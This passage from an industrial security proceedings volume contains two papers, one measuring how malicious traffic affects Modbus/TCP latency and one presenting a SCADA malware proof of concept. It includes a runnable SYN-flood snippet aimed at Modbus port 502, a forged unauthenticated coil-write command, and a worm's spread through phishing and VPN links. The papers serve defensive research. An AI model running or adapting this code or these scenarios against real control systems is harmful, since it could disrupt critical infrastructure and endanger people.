5. ISO: Code voor Informatiebeveiliging/Information technology - Security techniques - Code of practice for information security management framework, ISO/IEC 17799:2005. This standard will be renamed ISO/IEC 27002
6. EWICS TC7: A Study of the Applicability of ISO/IEC 17799 and the German Baseline Protection Manual to the Needs of Safety Critical Systems. European Workshop on Industrial Computer Systems - Executive Summary (March 2003), http://www.ewics.org/attachments/roadmap-project/RdMapD31ExecSummary.pdf
7. EWICS TC7: A Study of the Applicability of ISO/IEC 17799 and the German Baseline Protection Manual to the Needs of Safety Critical Systems. European Workshop on Industrial Computer Systems (March 2003), http://www.ewics.org/attachments/roadmap-project/RdMapD31.pdf
8. Luiijf, H.A.M.: SCADA Good Practice voor de Nederlandse Drinkwatersector, report TNO DV2007 C478 (December 2007) [Dutch version; restricted distribution]
9. Luiijf, H.A.M.: SCADA Security Good Practices for the Dutch Drinking Water Sector, report TNO DV 2008 C096 (March 2008) [English version]
Analysis of Malicious Traffic in Modbus/TCP Communications
Tiago H. Kobayashi, Aguinaldo B. Batista Jr., João Paulo S. Medeiros, José Macedo F. Filho, Agostinho M. Brito Jr., and Paulo S. Motta Pires
LabSIN - Security Information Laboratory
Department of Computer Engineering and Automation - DCA
Federal University of Rio Grande do Norte - UFRN
Natal, 59.078-970, RN, Brazil
{hiroshi,aguinaldo,joaomedeiros,macedofirmino,ambj,pmotta}@dca.ufrn.br
Abstract. This paper presents the results of our analysis of the influence of Information Technology (IT) malicious traffic on an IP-based automation environment. We utilized a traffic generator, called MACE (Malicious trAffic Composition Environment), to inject malicious traffic into a Modbus/TCP communication system, and a sniffer to capture and analyze network traffic. The tests performed show that malicious traffic represents a serious risk to critical information infrastructures. We show that this kind of traffic can increase the latency of Modbus/TCP communication and that, in some cases, it can put Modbus/TCP devices out of communication.
Keywords: Critical Information Infrastructure Protection, Malicious Traffic Analysis, Threats and Attacks to AT Infrastructures, Automation Technology Security.
1 Introduction
Information security in Automation Technology (AT) environments has become a common topic of interest in industry. This concern stems mainly from the security issues related to the interconnection between SCADA and corporate networks, as discussed in several works [1,2,3]. Some other works propose feasible solutions to address these security problems [4,5,6,7]. Information security has also become an important matter because TCP/IP (Transmission Control Protocol/Internet Protocol) is used as the basis of many current automation protocols, such as Modbus/TCP, DNP3 over TCP and Ethernet/IP (Ethernet/Industrial Protocol), among others. This fact brings to the AT sector some of the TCP/IP weaknesses and vulnerabilities, including information security threats that can be caused by a weak TCP/IP stack implementation in devices. In this paper, we intend to assess the risks that common IT (Information Technology) threats can bring to critical infrastructures. We work with the hypothesis of an unprotected IP-based automation network compromised by common IT malicious traffic. Our focus is a Modbus/TCP automation network, because Modbus/TCP is a commonly used protocol in this environment.
Modbus/TCP is a TCP/IP variant of the Modbus protocol which encapsulates slightly modified Modbus serial frames into TCP segments. We analyze the influence of IT malicious traffic on Modbus/TCP transactions between Modbus/TCP clients and a Modbus/TCP-enabled Programmable Logic Controller (PLC) acting as a Modbus/TCP server. PLCs are control devices widely used in industrial automation critical infrastructures. The analysis consists basically in the use of two well-known network latency measurement methods, Round-Trip Time (RTT) and the TCP Time-sequence Graph, to evaluate how harmful malicious traffic can be to AT communications. The remainder of this paper is organized as follows. The next section presents some related works that address the influence of malicious traffic in IT environments. Section 3 presents the methods and testbeds used in our experiments. In Section 4, we describe the experiments performed and discuss the results. Finally, in Section 5, we conclude our work with some final considerations and suggestions for future work.
2 Related Works
Several works discuss the influence of malicious traffic in IT networks. Mirkovic et al. [8] present a study of the influence of Denial of Service (DoS) attacks on communications between IT devices. In this work, a metric is proposed for measuring the DoS impact on various network applications, considering parameters such as request/response delays, packet loss, and delay variation. The tests used well-known protocols such as HTTP, FTP, Telnet, ICMP and DNS, and the DoS attacks were based on UDP flooding and TCP SYN flooding. Another work presents an analysis of the effect of malicious traffic based on the latency of DNS and HTTP communications [9]. This analysis showed that there is an increase in the average latency of these protocols when the network is subjected to Distributed Denial of Service (DDoS) attack traffic, and that latency may therefore be used as a parameter to analyze the effects of malicious traffic. Our paper analyzes the influence of this traffic in AT networks, showing the need for security techniques to avoid undesirable threats and performance losses.
3 Method
In this section we present our approach to investigating the effects of malicious traffic in AT networks. We used a malicious traffic generator, called MACE (Malicious trAffic Composition Environment) [10], to inject traffic into a Modbus/TCP communication. MACE provides the basic building blocks for recreating the traffic of a large set of known attacks, viruses and worms, and can therefore simulate the behavior of common malicious traffic that affects IT networks.
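MACE itself composes attack, propagation and background-traffic building blocks; its internals are not reproduced here. Purely as an illustration of the kind of flooding primitive such a generator emits, the following sketch (using the Scapy packet library; the target address and packet count are assumptions, not values from MACE) sends a stream of TCP SYN segments toward the Modbus/TCP port:

```python
# Minimal sketch of a SYN-flood building block, in the spirit of the
# traffic MACE composes. The target address is hypothetical; sending
# raw packets requires administrator privileges, and such code must
# only be run inside an isolated testbed.
from scapy.all import IP, TCP, RandShort, send

TARGET = "192.168.0.10"   # hypothetical Modbus/TCP device
MODBUS_PORT = 502

def syn_flood(count=1000):
    # Each packet carries a random source port, so the victim keeps
    # allocating state for many half-open connections.
    pkt = IP(dst=TARGET) / TCP(sport=RandShort(),
                               dport=MODBUS_PORT, flags="S")
    send(pkt, count=count, verbose=False)

if __name__ == "__main__":
    syn_flood()
```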
In this work, MACE was used as a performance benchmarking tool that supported the analysis of Quality of Service (QoS) degradation in a Modbus/TCP network. This QoS degradation is expressed here through two TCP latency measurement techniques:
– Round-Trip Time (RTT): the measure of the time a packet takes to travel across a network, i.e., the time a packet takes to travel from the sender to the receiver plus the time its response takes to get back to the sender. The RTT of a TCP segment is defined as the time it takes for the segment to reach the receiver and for a segment carrying the generated acknowledgment to return to the sender [11]. This technique expresses the latency of TCP communications.
– TCP Time-sequence Graph: a plot of the starting TCP sequence number in a segment versus the time at which the segment was sent [12]. It is a convenient way to visualize the flow of a TCP connection over time, and can indicate segment delays and retransmissions in a TCP connection.
We use these measurements to draw some conclusions about the influence of malicious traffic on Modbus/TCP communication.
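In practice, the authors extract these measurements with a network analyzer (Section 3.2). Purely as an illustration of the RTT notion, application-level samples for a request/response protocol can be collected by timestamping each transaction; the host, port and request bytes below are placeholders:

```python
# Sketch: collect application-level RTT samples for a request/response
# TCP service by timestamping each transaction. Address and request
# payload are placeholders, not the setup used in the paper.
import socket
import time

def sample_rtts(host, port, request, n=100):
    rtts = []
    with socket.create_connection((host, port), timeout=5) as sock:
        for _ in range(n):
            t0 = time.perf_counter()
            sock.sendall(request)
            sock.recv(256)                       # wait for the response
            rtts.append(time.perf_counter() - t0)
    return rtts
```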
3.1 Testbeds
We established two testbeds to illustrate different situations. The first represents a case where an infected Modbus/TCP client communicates with the server; here we want to analyze the influence of the IT malicious traffic generated by the client on its own connection with the server. In the second situation, two clients communicate with a Modbus/TCP server, but one of them injects malicious traffic into the network; here we intend to analyze the influence of the traffic generated by one client on the connection of the other. The first situation is represented by the testbed shown in Figure 1. In this testbed, we have a PC running a Modbus/TCP client and MACE, another PC
Fig. 1. Testbed 1 - A Modbus/TCP client running MACE, a traffic monitor and a PLC
Fig. 2. Testbed 2 - Two clients (one of them running MACE), a traffic monitor and a PLC
running a sniffer as a monitor, and the Modbus/TCP PLC module, all connected to the same switch. This switch was configured to replicate the traffic between the client and the server to the monitoring computer. The second situation is represented by the testbed illustrated in Figure 2. This testbed differs from the first only by the existence of a second PC running only the Modbus/TCP client (Client 1).
3.2 Tools
The Modbus/TCP clients used in both testbeds have the particularity of establishing a single TCP connection with the PLC module and permanently sending the same Modbus/TCP packet until the connection is closed by the client. To do this, we modified our Modbus/TCP packet manipulation software [13] in order to analyze the influence of malicious traffic on a specific TCP connection. For monitoring the network traffic, we used a well-known network sniffer, Wireshark [14], to capture and analyze the Modbus/TCP traffic between the clients and the server. Wireshark provides a set of functions for the statistical analysis of several network protocols. As Modbus/TCP uses the TCP/IP stack, we perform statistical analyses of the TCP connection that carries the Modbus/TCP transactions; we use these Wireshark functions to analyze RTT and to build the TCP Time-sequence Graph.
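The modified packet manipulation client of [13] is not reproduced here; the sketch below only illustrates the behaviour just described, i.e. a single persistent TCP connection over which the same Modbus/TCP request is sent repeatedly. The PLC address and the choice of a Read Holding Registers request (function 0x03) are assumptions:

```python
# Sketch of a client that opens a single TCP connection to the PLC
# and repeatedly sends the same Modbus/TCP request, as the modified
# client described above does. The PLC address is hypothetical.
import socket
import struct

PLC = ("192.168.0.10", 502)      # hypothetical PLC address

def modbus_read_request(tid, unit=1, start=0, count=10):
    # MBAP header: transaction id, protocol id (0), remaining length,
    # unit id; PDU: function 0x03, starting address, register count.
    pdu = struct.pack(">BHH", 0x03, start, count)
    mbap = struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit)
    return mbap + pdu

with socket.create_connection(PLC) as sock:
    tid = 0
    while True:                   # runs until the client closes the socket
        sock.sendall(modbus_read_request(tid))
        sock.recv(260)            # a Modbus/TCP ADU is at most 260 bytes
        tid = (tid + 1) & 0xFFFF
```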
4 Experiments and Results
The experiments were performed on the described testbeds, and Wireshark was used to plot RTT samples and TCP Time-sequence Graphs. Figure 3 shows the
Fig. 3. RTT graph of a Modbus/TCP communication under Testbed 1
RTT graph of an active Modbus/TCP communication in Testbed 1 without the presence of malicious traffic. As can be seen, no RTT samples exceeded 0.010 seconds. This was used as a baseline for comparison with Modbus/TCP communication affected by malicious traffic. After that, under the same testbed, we captured the network traffic in the presence of Blaster worm [15] traffic, to compare it with the malicious-traffic-free case. Figure 4 presents the RTT graph of the Modbus/TCP communication with injection of Blaster traffic into the network. This figure shows a slight increase in RTT values, but the maximum values still did not exceed 0.010 seconds. We then configured MACE in the client to inject the traffic of 21 common threats into the network, in order to simulate the network traffic generated by a heavily infected Modbus/TCP client computer. Figure 5 shows the RTT behavior of this traffic. In this case, RTT values increased significantly, and some reached approximately 25 seconds. The TCP Time-sequence analysis of the traffic with 21 common threats is presented in Figure 6. It shows that there were delays in the dispatch of TCP segments; a delay-free traffic graph would show an increasing straight line. For Testbed 2, the tests were performed in the same way as in Testbed 1. With this testbed we intend to analyze the influence of an infected Modbus/TCP client on the communication of a non-infected one. The RTT behavior for the two non-infected clients is similar to that shown in Figure 3. Figure 7 shows the RTT behavior of Client 1 when Client 2 injects the oshare [16] attack traffic into the network. This graph shows a general increase of RTTs, with maximum values reaching up to 3 seconds. We decided to show
Fig. 4. RTT graph of a Modbus/TCP communication in presence of Blaster worm traffic under Testbed 1
Fig. 5. RTT graph of Modbus/TCP communication in presence of 21 common threats under Testbed 1
this graph because, in our tests, the oshare attack was the only one which considerably affected the communication between Client 1 and the Modbus/TCP module. Figure 8 presents the TCP Time-sequence Graph for Client 1 when Client 2 injects oshare traffic into the network. It is possible to note the delays in the
Fig. 6. TCP Time-sequence Graph of Modbus/TCP communication in presence of 21 common threats under Testbed 1
Fig. 7. RTT graph for Client 1 traffic under Testbed 2 (Client 2 injecting traffic of oshare attack)
dispatch of TCP segments from Client 1 caused by the malicious traffic injected into the network by Client 2. A normal traffic graph for Client 1 would show an increasing straight line.
Fig. 8. TCP Time-sequence Graph for Client 1 under Testbed 2 (Client 2 injecting traffic of oshare attack)
Fig. 9. RTT graph for Client 1 under Testbed 2 (Client 2 injecting traffic of 20 common threats excluding oshare)
In another experiment, we configured MACE in Client 2 to inject the malicious traffic of 20 common threats (without oshare). In this case, the RTT graph for Client 1 (malicious-traffic-free) shows similar RTT values in comparison with
Fig. 10. TCP Time-sequence Graph for Client 1 under Testbed 2 (Client 2 injecting traffic of 20 common threats excluding oshare)
the RTT values obtained with oshare alone. Figure 9 illustrates the RTT graph for Client 1 when Client 2 injects this malicious traffic into the network. The TCP Time-sequence Graph for Client 1 under the same 20-threat traffic is shown in Figure 10. Its behavior is similar to that of the graph obtained by injecting only the oshare attack traffic. Observing the last graphs, we can conclude that a single threat can be as harmful as a set of other threats. Another important observation is that, in some tests with MACE, the Modbus/TCP PLC module went out of communication. As can be verified in Figure 10, at the end of the curve Client 1 started to retransmit a TCP segment, showing that there was no response from the Modbus/TCP module.
5 Final Considerations
This work presented an analysis of the influence of IT malicious traffic in AT networks, especially Modbus/TCP-based ones. IT malicious traffic can increase the normal latency of AT networks and, in some cases, can put automation devices out of communication. This fact attests to how harmful IT malicious traffic can be to AT networks, where time is in most cases critical and devices perform delicate tasks. Future works under this approach will consider the use of real threats to validate the results obtained here with MACE. It would also be convenient to set up a more realistic testbed representing, for example, a more complex system with interconnected corporate and automation networks. The test procedure used in this work may be appropriate to evaluate the influence of IT traffic in other IP-based automation networks.
The influence of malicious traffic in AT networks may justify the use of IT security techniques in AT networks as well. The use of VPNs (Virtual Private Networks) and firewalls would constitute feasible countermeasures to minimize the effects of IT malicious traffic in AT environments. However, such techniques may themselves introduce delays, and therefore an appropriate performance analysis would be required before their application in AT environments.
Acknowledgements
The authors would like to express their gratitude to the Department of Computer Engineering and Automation, Federal University of Rio Grande do Norte, and to REDIC (Instrumentation and Control Research Network) for supporting this work. The authors would also like to thank Dr. J. Sommers for supplying us with a copy of the MACE software.
References
1. Pires, P.S.M., Oliveira, L.A.H.G.: Security Aspects of SCADA and Corporate Network Interconnection: An Overview. In: Dependability of Computer Systems, DepCoS-RELCOMEX 2006, May 2006, pp. 127–134 (2006)
2. Igure, V.M., Laughter, S.A., Williams, R.D., Brown, C.L.: Security Issues in SCADA Networks. Computers & Security 25(7), 498–506 (2006)
3. Ralston, P.A.S., Graham, J.H., Hieb, J.L.: Cyber Security Risk Assessment for SCADA and DCS Networks. ISA Transactions 46(4), 583–594 (2007)
4. 21 Steps to Improve Cyber Security of SCADA Networks. President's Critical Infrastructure Protection Board and Department of Energy Report (2002), http://www.oe.netl.doe.gov/docs/prepare/21stepsbooklet.pdf
5. Fernandez, J.D., Fernandez, A.E.: SCADA Systems: Vulnerabilities and Remediation. Journal of Computing Sciences in Colleges 20(4), 160–168 (2005)
6. Naedele, M.: Addressing IT Security for Critical Control Systems. In: 40th Annual Hawaii International Conference on System Sciences, HICSS 2007, January 2007, p. 115 (2007)
7. Pollet, J.: Developing a Solid SCADA Security Strategy. In: 2nd ISA/IEEE Sensors for Industry Conference, November 2002, pp. 148–156 (2002)
8. Mirkovic, J., Reiher, P., Fahmy, S., Thomas, R., Hussain, A., Schwab, S., Ko, C.: Measuring Denial of Service. In: Proceedings of the 2nd ACM Workshop on Quality of Protection, pp. 53–58 (2006)
9. Lan, K., Hussain, A., Dutta, D.: The Effect of Malicious Traffic on the Network. In: Proc. PAM 2003 (April 2003)
10. Sommers, J., Yegneswaran, V., Barford, P.: A Framework for Malicious Workload Generation. In: Proceedings of the 4th ACM SIGCOMM Conference on Internet Measurement, October 2004, pp. 82–87 (2004)
11. Aikat, J., Kaur, J., Smith, F.D., Jeffay, K.: Variability in TCP Round-Trip Times. In: Proceedings of the 3rd ACM SIGCOMM Conference on Internet Measurement, pp. 279–284 (2003)
12. Stevens, W.R.: TCP/IP Illustrated, Vol. 1: The Protocols. Addison-Wesley, Reading (1999)
13. Kobayashi, T.H., Batista Jr., A.B., Brito Jr., A.M., Motta Pires, P.S.: Using a Packet Manipulation Tool for Security Analysis of Industrial Network Protocols. In: IEEE Conference on Emerging Technologies and Factory Automation, ETFA 2007, Patras, Greece, September 25-28, pp. 744–747 (2007)
14. Wireshark: Go Deep, http://www.wireshark.org/
15. CVE-2003-0352. Common Vulnerabilities and Exposures, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0352
16. CVE-1999-0357. Common Vulnerabilities and Exposures, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0357
Scada Malware, a Proof of Concept
Andrea Carcano1, Igor Nai Fovino1, Marcelo Masera1, and Alberto Trombetta2
1 Institute for the Protection and the Security of the Citizen, Joint Research Centre, European Commission, via E. Fermi 1, Ispra, 21027, VA, Italy
2 Department of Computer Science, University of Insubria, Via H.J. Dunant 3, 21100, Varese, Italy
Abstract. Critical Infrastructures are nowadays exposed to new kinds of threats. The cause of such threats is the large number of new vulnerabilities and architectural weaknesses introduced by the extensive use of ICT and network technologies in such complex critical systems. Of particular interest is the set of vulnerabilities related to the class of communication protocols normally known as "SCADA" protocols, under which fall all the communication protocols used to remotely control the RTU devices of an industrial system. In this paper we present a proof of concept of the potential effects of a set of computer malware specifically designed and created to impact a typical Supervisory Control and Data Acquisition system, by taking advantage of some vulnerabilities of the ModBUS protocol.
Keywords: Security, SCADA Systems, Critical Infrastructures, Malware.
1 Introduction
Security threats are one of the main problems of this computer-based era. All systems making use of information and communication technologies (ICT) are prone to failures and vulnerabilities that can be exploited by malicious software and agents. In recent years, industrial critical installations have also started to make massive use of network interconnections and, what is worse, they have come into "contact" with the public network, i.e. with the Internet. The net effect of this new trend is the introduction of a new interleaved and heterogeneous architecture combining typical information systems (e.g. databases, web servers, web applications and web activities) with real-time elements implementing the control functions of industrial plants. If, from a certain point of view, the advantages of such complex architectures are several (remote management functions, distributed control and management systems, "on the fly" monitoring, etc.), on the other hand they introduce a new layer of exposure to malicious threats. This aspect is not negligible at all when the industrial installation considered falls under the category of Critical Infrastructure.1 Several studies [1] [2] [3] have
1 Critical infrastructure includes any system, asset or service that, if disabled or disrupted in any significant way, would result in catastrophic loss of lives or catastrophic economic loss.
proved that modern industrial critical infrastructures are, on average, prone to traditional computer attacks and threats. However, until now, the analyzed and identified scenarios have usually been based on traditional ICT threats and attacks, i.e. viruses, malware and attack schemes well known in the traditional ICT world (e.g. Nimda, CodeRed, web-server buffer overflows, etc.). Even if several of these scenarios have serious effects on industrial systems, they are not "tailored" to such systems. In this paper we present a proof of concept of the potential effect of a computer malware specifically designed and created to impact a typical Supervisory Control and Data Acquisition system. The paper is organized as follows: in section 2 a brief state of the art in the field of critical infrastructure ICT security is presented, while in section 3 we provide some preliminary definitions. In section 4 a description of the experimental environment in which we conducted our tests is provided; in section 5 we present extensively the studied malware, the attack scenarios and the experimental results obtained. Finally, the conclusions are presented in section 6.
2 Related Works
Critical industrial infrastructures usually adopt network schemes which are really tailor-made, ad-hoc solutions. In the same way, the communication protocols used, for example, in a typical SCADA master-slave architecture are dedicated, and they constitute a "completely separated world" with its own vulnerabilities and attack patterns, different from the traditional ICT world. In that field, several works have been done. Creery and Byres [4] presented an interesting high-level analysis of the possible threats to a power plant system, a categorization of the typical hardware devices involved, and some high-level discussion about intrinsic vulnerabilities of common power plant architectures. A more detailed work on the topic of SCADA security is presented by Chandia, Gonzalez, Kilpatrick, Papa and Shenoi [5]. In this work, the authors describe two possible strategies for securing SCADA networks, underlining that several aspects have to be improved in order to "secure" that kind of architecture. What is evident in primis is that the communication protocols used in such systems (e.g. Modbus, DNP3, etc.) were not conceived taking into consideration typical ICT threats. Historically, this is due to the fact that when they were designed, the world of industrial control systems was completely isolated from the public networks, and ICT-based intrusion scenarios were therefore considered completely negligible. Some works have been done on the security of such specialized communication protocols: for example, Majdalawieh, Parisi-Presicce and Wijesekera [6] presented an extension of the DNP3 protocol, called DNPSec, which tries to address some of the known security problems of such master-slave control protocols (i.e. integrity of the commands, authentication, non-repudiation, etc.). Similar approaches have been presented by Heo, Hong, Ju, Lim, Lee and Hyun [7], while Mander, Nabhani and Cheung [8] presented a proxy filtering solution aiming at identifying and avoiding anomalous control traffic. However, it seems that ICT security in control systems is still, at the moment, an open and
evolving research field. A relevant role is played by field tests: theoretical analyses, in order to be considered "consistent", have to be supported by field tests. In the context of Critical Infrastructures, Masera et al. [1] [2] presented the results of two field test campaigns studying the real effects of a set of well-identified attack scenarios against (a) an electric distribution station and (b) a real power plant.
3 Preliminary Definitions
In this section we give some preliminary definitions related to ICT security and to process control systems. This work is strongly connected with some concepts traditionally derived from the field of computer security; in particular, three elements of interest need to be defined: the concepts of Threat, Vulnerability and Attack. As defined in [9] and in the Internet RFC glossary of terms, a Threat is a potential for violation of security, which exists when there is a circumstance, capability, action, or event that could breach security and cause harm. A Vulnerability, by definition [10][11], is a weakness in the architecture, design or implementation of an application or a service. Finally, an Attack can be identified as the entire process allowing a Threat Agent to exploit a system by the use of one or more Vulnerabilities. From an architectural point of view, we concentrate our attention on what is known under the acronym of SCADA system (Supervisory Control And Data Acquisition system). This class of systems is widely used in industrial settings to control and manage field sensors and actuators. While other works [2] concentrated their attention on traditional ICT architectural vulnerabilities, in this paper we focus our efforts on the typical communication protocols used in such systems. In other words, as will be presented in the next section, we want to develop a proof of concept of a malware which, by taking advantage of some vulnerabilities of such protocols, is able to perpetrate malicious actions against the critical system. Such protocols are normally used by dedicated servers to send commands to the field devices; by using them it is possible, for example, to force a device to open a valve. Several protocols are in use (ModBUS, ProfiBUS, DNP3, etc.). For our tests we have taken the ModBUS protocol as an example, for several reasons: (a) it is widely used, and (b) there exists extensive literature about the security flaws of this protocol (see for example [3]). ModBUS is an application layer messaging protocol, positioned at level 7 of the Open Systems Interconnection (OSI) model (in the case of ModBUS over TCP), that provides client/server communication between devices connected on different types of buses or networks. Communications can be of (i) query/response type (communication between a master and a slave), or (ii) broadcast type, where the master sends a command to all the slaves. A transaction comprises a single query and a single response frame, or a single broadcast frame. A ModBUS frame message contains the address of the intended receiver, the command the receiver must execute and possibly the data needed for the execution of such
command. Modbus/TCP basically embeds a ModBUS frame into a TCP frame [12]. All the functions supported by the ModBUS protocol are identified by an index number. The ModBUS protocol, like DNP3 and ProfiBUS, was conceived when the subject of ICT security was not relevant for process control systems. For that reason, aspects such as integrity, authentication and non-repudiation were not taken into consideration when it was designed. More in detail, such protocols (a) do not apply any mechanism for checking the integrity of the command packets sent by a master to a slave, (b) do not perform any authentication between master and slaves, and (c) do not apply any non-repudiation mechanism to the master. In the next section, in the light of such considerations, we will present some attack scenarios which take advantage of these shortcomings.
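To make these shortcomings concrete: since no authentication or integrity field protects the frame, any host able to reach a slave can hand-craft a syntactically valid command that the slave will execute. The sketch below illustrates this with a Write Single Coil command (function 0x05); the slave address is hypothetical, and such code must only ever be run in an isolated testbed:

```python
# Sketch: forging a valid Modbus/TCP Write Single Coil command.
# Because the protocol carries no authentication or integrity field,
# a slave will execute this frame regardless of who sent it.
# The slave address is hypothetical; use only in an isolated testbed.
import socket
import struct

SLAVE = ("192.168.0.20", 502)     # hypothetical ModBUS slave

def force_coil(address, on, unit=1, tid=1):
    # PDU: function 0x05, coil address, 0xFF00 = ON / 0x0000 = OFF
    pdu = struct.pack(">BHH", 0x05, address, 0xFF00 if on else 0x0000)
    mbap = struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit)
    with socket.create_connection(SLAVE) as sock:
        sock.sendall(mbap + pdu)
        return sock.recv(260)     # the slave echoes the request on success

force_coil(address=0, on=True)
```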
4 Experimental Environment
In contrast to alternative works which use modeling approaches to reconstruct the underlying network, thanks to a collaboration project with a power company we recreated in a protected environment, as shown in figure 1, the architecture of a typical power plant, plus a set of additional infrastructures supporting the implementation of our tests in a systematic and scientific way.
Fig. 1. High level laboratory environment schema
More in detail, this environment is constituted by:
– Power Plant Backbone: composed of all the network devices which allow the different subnets of the power plant to communicate (3-layer switches, process network firewall, routers, Internet firewall).
– Field Network: the network interconnecting the sensors and the actuators which directly interact with the power plant electro-mechanical devices.
– Process Network: this network hosts all the SCADA systems. By using these systems, the plant operators manage the whole power plant, sending control commands to the sensors in the Field Network and reading plant measurements and parameters.
– Data Exchange Network: this area hosts a set of "data exchange" servers, which receive data from the process network and make them available to the operators working in the Power Plant Intranet.
– Power Plant Intranet: the branch of the company network that provides intranet services to the power plant operators. It is used not only to conduct "office work", but also to keep the power plant under remote control, by accessing, through VPN (Virtual Private Network) authentication, the DMZ (Demilitarized Zone) and the Process Network of a target power plant.
– Public Network: this network simulates the "rest of the world" (i.e. the Internet). In recent years, as stated before, several critical infrastructures have started to use the public network as a communication channel in order to provide new services. For that reason, the simulation of this network is extremely important for analyzing possible new attack profiles.
– Observer Network: a network of sensors which is used to gather information about the system during the experiments.
– Horizontal Services Network: it provides the usual features of backup, disaster recovery, etc.
– Vulnerability and Attack repository systems: a set of databases and analysis systems for analyzing the collected data.
The whole laboratory environment reproduces all the relevant characteristics of a typical power plant; for example, the Windows domain of the Power Plant Intranet has the identical security and domain policies of a real one which we had the chance to analyze during our research activity, and the process firewall is the same used by default in the power plants of the power company with which we collaborated, with the same filtering rules and configurations. This complex testing architecture has allowed us to test attack scenarios too complex to be represented in a simulated environment and too heavy to be realized in a "production facility".
5 Scada Malware and Attack Scenarios
Starting from the considerations made in section 3, we identified two possible scenarios in which a tailor-made malware could be effective and create
serious damage to a critical control system. Since our experimental laboratory is at the moment tailored to recreating the environment of a power plant, in the following we will consider the effects of our attack tests on this kind of system. As described below, we concentrate our attention on a particular SCADA protocol, ModBUS, and the malware we have developed takes advantage of some conceptual and architectural vulnerabilities of this protocol.
5.1 ModBUS Malware DoS Scenario
Originally, ModBUS was conceived to be used over serial cable. In such a context, clearly, the risk of external interference on the communication channel between the master and the slave was considered practically negligible (at least if we do not consider electromagnetic interference and physical interruption of the cables). In other words, under such constraints, this closed system was considered highly reliable. The porting of the ModBUS protocol over TCP has obviously introduced new layers of complexity in managing the reliable delivery of control packets in a strongly real-time environment and, moreover, has opened new possibilities for attackers strongly motivated to cause damage to the target system.
Attack scope. The scope of the DoS attack is to desynchronize the communication between master and slave and, if possible, completely block the communication stream between master and slaves. In the light of what was presented before, in order to damage the control communication stream it should be sufficient to perform some sort of packet storm against the master or the set of slaves of the control system. A generic packet storm generator could normally be identified by a network intrusion detection sensor, or by a firewall anomaly detection engine. Ideally, if the packet storm recreates the same "traffic shape" as ModBUS traffic, it should be possible to circumvent the monitoring systems while still preventing communication between master and slaves.
Attack implementation. We have implemented a particular kind of malware which, once launched, tries to discover the ModBUS slaves connected to the same network as the infected machine, and which then starts to send them a huge set of ModBUS packets, trying to overload their network bandwidth. More in detail, this malware is composed of the following logical units:
– A Packet builder, which forges well-formed ModBUS over TCP packets.
– A Discovery engine, which explores the network in order to identify the IP addresses of the ModBUS slaves.
– A Packet deliverer, which sends the previously forged packets to the target slaves in an optimized way, in order to saturate the bandwidth as quickly as possible.
Such a malware, without a proper "infection trigger", is only an optimized ModBUS packet generator whose unique scope is sending out a huge number of
packets to all the slaves it is able to identify. Such a malware could be effective only when the attacker is able to launch the malicious code directly on a PC connected to the field or process network of a SCADA system. This scenario is reasonably plausible (for example, the attacker could simply be a disgruntled employee or operator having direct access to the control system devices); however, it will rarely be the first attack option for an internal attacker. Below we describe other scenarios which can be used instead by an external attacker.
– E-mail based spreading scenario: Some studies regarding the security policies usually implemented in power companies [2] show how the patching operations of PCs or embedded systems in power plant process networks are "e-mail based". In other words, a power plant operator receives an e-mail from the ICT security team, containing the patching instructions and the patch to be installed. In this scenario the attacker, after gathering information about the hierarchical organization of the ICT security team and about the process operators, forges an e-mail identical to the one usually sent for updating purposes (identical not only in content, but also in terms of headers), with the previously described malware attached instead of a normal patch. In this e-mail the attacker asks the operator to install the attached patch on a target master, or on a PC in the same network. Once installed, the malware will start to deliver massive amounts of ModBUS packets to the slaves, so that master and slaves become desynchronized.
– Through phishing infection: Phishing attacks are typically mounted in one of the following ways: by means of a faked e-mail displaying a link which seems to point to a legitimate site but actually links to a malicious website; or by poisoning the victim's DNS server, thus making it possible to transparently connect to the malicious server. Usually the scope of such attacks is to steal user credentials. We modified this scenario slightly: in our case, the fake web server contains a set of malicious scripts allowing our ModBUS malware to be downloaded and executed on the local machine from which the web page has been accessed. The scenario develops as follows: (a) by the use of a fake e-mail or by poisoning the DNS of the process network, an operator is induced to visit an ad-hoc created website; (b) a set of scripts on the website, using some well-known vulnerabilities of Microsoft Internet Explorer, downloads and executes the ModBUS malware on the operator's PC; (c) the legal ModBUS traffic is interrupted.
– ModBUS DoS worm: This sub-scenario is the most relevant we have realized in the context of the ModBUS DoS. Using the MAlSim platform [13][14], a platform which uses the agent paradigm to fully reproduce the behavior of a large set of known viruses and worms, we created a set of malware that uses the infection techniques of some of the most famous viruses (Slammer, Nimda, CodeRed). These new worms carry in their payload the code of our ModBUS DoS malware. In this way, every time they infect a new machine, they (i) start to spread themselves by using the new host's resources, and (ii) execute the ModBUS DoS code. The net effect is then the
creation of a first DoS malware, completely independent and designed ad hoc for affecting SCADA systems. Below is the step-by-step infection evolution of the ModBUS DoS worm we implemented:
1. From the Internet, the worm infects the PCs in the Company Intranet.
2. If one of the infected PCs in the Company Intranet opens a VPN connection to the Process Network of the power plant (a common procedure in the remote management policies of a power plant), the worm spreads itself through this VPN and starts to infect the PCs in the process network.
3. If the worm discovers ModBUS slaves in the network, it starts to send ModBUS packets in order to desynchronize or completely interrupt the master/slave ModBUS command flow.
Experimental Tests. The scenarios described in the previous section have been successfully implemented and tested in our laboratory (which, we recall, recreates with high precision the architecture of a typical power plant). In all the presented cases, the final result of the implemented attacks was the interruption of communication between the ModBUS master and slaves. Tables 1 and 2 show the delays introduced into the master/slave communication as the bandwidth consumption caused by the ModBUS DoS malware increases. As can be seen, a non-negligible factor in the degradation of the communication performance is also played by some settings of the communication protocol, for example the scanning rate and the connection timeout. Under attack, systems with a low scanning rate tend to desynchronize faster than systems with a high scanning rate (if, for example, a master tries to read a slave register with a scanning rate of 1 read every 2000 ms, the difference between the real value of the slave register and what the master acquires will grow faster than in a situation in which the scanning rate is 1 read every 200 ms). A similar observation can be made for the connection timeout settings: under attack, a system with a low connection timeout will be more easily affected by this kind of DoS. The ModBUS DoS worm proved to be the most dangerous of the scenarios presented; in fact, such a worm could potentially infect more than one PC in the process network simultaneously, increasing the average bandwidth consumption and speeding up the network degradation. As a final remark on these tests, it is relevant to note that, since the worms created were what is known in virology jargon as "zero-day worms" (i.e. worms for which signatures have not yet been released), and since they perform the attack using legal ModBUS packets, neither the antivirus tools nor the network intrusion detection systems (NIDS) with standard settings were able to detect the cause of the attack.
